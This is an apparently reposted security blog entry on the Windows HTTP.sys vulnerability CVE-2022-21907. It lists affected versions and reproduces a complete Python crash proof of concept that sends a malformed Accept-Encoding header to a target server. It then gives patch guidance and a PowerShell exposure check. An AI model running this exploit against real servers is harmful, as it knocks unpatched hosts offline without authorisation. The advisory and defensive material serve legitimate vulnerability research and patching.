HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2022-21907): Reproduction
VSole 2022-01-25 07:31:03
Source: 洛米唯熊
0x00 Vulnerability overview
A remote code execution vulnerability exists in the HTTP protocol stack: a boundary error in the HTTP Trailer Support feature of the HTTP protocol stack (HTTP.sys) can lead to a buffer overflow.
An unauthenticated attacker can trigger the buffer overflow by sending specially crafted HTTP packets to the web server and thereby execute arbitrary code on the target system. Microsoft rates the vulnerability as "wormable": it requires no user interaction and could self-propagate across the network.
CVSS score: 9.8
0x01 Affected versions
- Windows Server 2019 (Server Core installation)
- Windows Server 2019
- Windows 10 Version 21H2 for ARM64-based Systems
- Windows 10 Version 21H2 for 32-bit Systems
- Windows 11 for ARM64-based Systems
- Windows 11 for x64-based Systems
- Windows Server, version 20H2 (Server Core Installation)
- Windows 10 Version 20H2 for ARM64-based Systems
- Windows 10 Version 20H2 for 32-bit Systems
- Windows 10 Version 20H2 for x64-based Systems
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows 10 Version 21H1 for 32-bit Systems
- Windows 10 Version 21H1 for ARM64-based Systems
- Windows 10 Version 21H1 for x64-based Systems
- Windows 10 Version 21H2 for x64-based Systems
- Windows 10 Version 1809 for ARM64-based Systems
- Windows 10 Version 1809 for x64-based Systems
- Windows 10 Version 1809 for 32-bit Systems
0x02 Reproduction
The crash PoC below (by Podalirius) sends an oversized Accept-Encoding header while a second thread polls the target to report when it stops responding.

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : CVE-2022-21907_http.sys_crash.py
# Author             : Podalirius (@podalirius_)
# Date created       : 13 Jan 2022

import argparse
import datetime
import requests
import time
import threading


def parseArgs():
    parser = argparse.ArgumentParser(description="Description message")
    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


def monitor_thread(target, dtime=5):
    # Poll the target once per second and report whether it still answers.
    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)
    for k in range(dtime):
        try:
            r = requests.get(target, timeout=1)
        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
            print(" [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        else:
            print(" [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        time.sleep(1)


if __name__ == '__main__':
    options = parseArgs()

    if not options.target.startswith('http://') and not options.target.startswith('https://'):
        target = "http://" + options.target
    else:
        target = options.target

    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'

    # Starting monitoring thread
    t = threading.Thread(target=monitor_thread, args=(target,))
    t.start()
    time.sleep(2)

    # Sending payload
    print(" [+] Sending payload ...")
    try:
        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)
    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
        t.join()
        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))

    # Cleanup
    t.join()
```
0x03 Remediation
Microsoft has released patches for the affected versions; affected users are advised to apply the official security update promptly. Link:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
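Before patching, an administrator will want to know whether a given host actually exposes the vulnerable HTTP Trailer Support feature. The PowerShell check below is an added example, not part of the original post or of the PoC; it assumes the `EnableTrailerSupport` DWORD under `HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters` and the statement that only Windows Server 2019 / Windows 10 1809 (build 17763) leave the feature off by default, both as documented in the Microsoft advisory linked above, and uses a placeholder for the KB number, which must be taken from that advisory.

```powershell
# Added example (not from the original post): report whether this host has
# HTTP.sys trailer support enabled, so the urgency of the CVE-2022-21907 update
# can be judged. Key path / value name are assumed from Microsoft's advisory.
$HttpParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters'
$ValueName  = 'EnableTrailerSupport'
$OffByDefaultBuild = 17763   # Windows 10 1809 / Windows Server 2019

function Get-HttpSysTrailerState {
    # Returns Present (value exists) and Enabled (value is non-zero).
    $props = Get-ItemProperty -Path $HttpParams -ErrorAction SilentlyContinue
    if ($null -eq $props -or $null -eq $props.$ValueName) {
        return [pscustomobject]@{ Present = $false; Enabled = $false }
    }
    return [pscustomobject]@{ Present = $true; Enabled = ($props.$ValueName -ne 0) }
}

function Get-HttpSysVersion {
    # File version of the running HTTP.sys driver, for comparison with the advisory.
    $drv = Join-Path $env:SystemRoot 'System32\drivers\http.sys'
    return (Get-Item $drv).VersionInfo.ProductVersion
}

$state = Get-HttpSysTrailerState
$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber

Write-Host ("OS build              : {0}" -f $build)
Write-Host ("http.sys file version : {0}" -f (Get-HttpSysVersion))
Write-Host ("EnableTrailerSupport  : present={0} enabled={1}" -f $state.Present, $state.Enabled)

# On build 17763 the feature is only active if the value was explicitly set to 1.
# On every other affected build it is active by default, so an absent value does
# NOT mean the host is safe: treat it as exposed until the update is installed.
$exposed = if ($build -eq $OffByDefaultBuild) { $state.Enabled } else { -not ($state.Present -and -not $state.Enabled) }

if ($exposed) {
    Write-Warning "HTTP.sys trailer support is active on this host; install the CVE-2022-21907 update."
    Write-Host "Interim measure (only if trailers are not required by hosted apps), then reboot:"
    Write-Host "  Set-ItemProperty -Path '$HttpParams' -Name '$ValueName' -Value 0 -Type DWord"
} else {
    Write-Host "Trailer support is disabled; the update should still be installed on schedule."
}

# Confirm the update is present, using the KB number from the advisory:
#   Get-HotFix -Id KB<NUMBER-FROM-ADVISORY>
```

Run it in an elevated session on each IIS / HTTP.sys host (anything using the HTTP Server API, not only IIS); the registry workaround is a stopgap and does not replace the update.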
VSole
Cybersecurity expert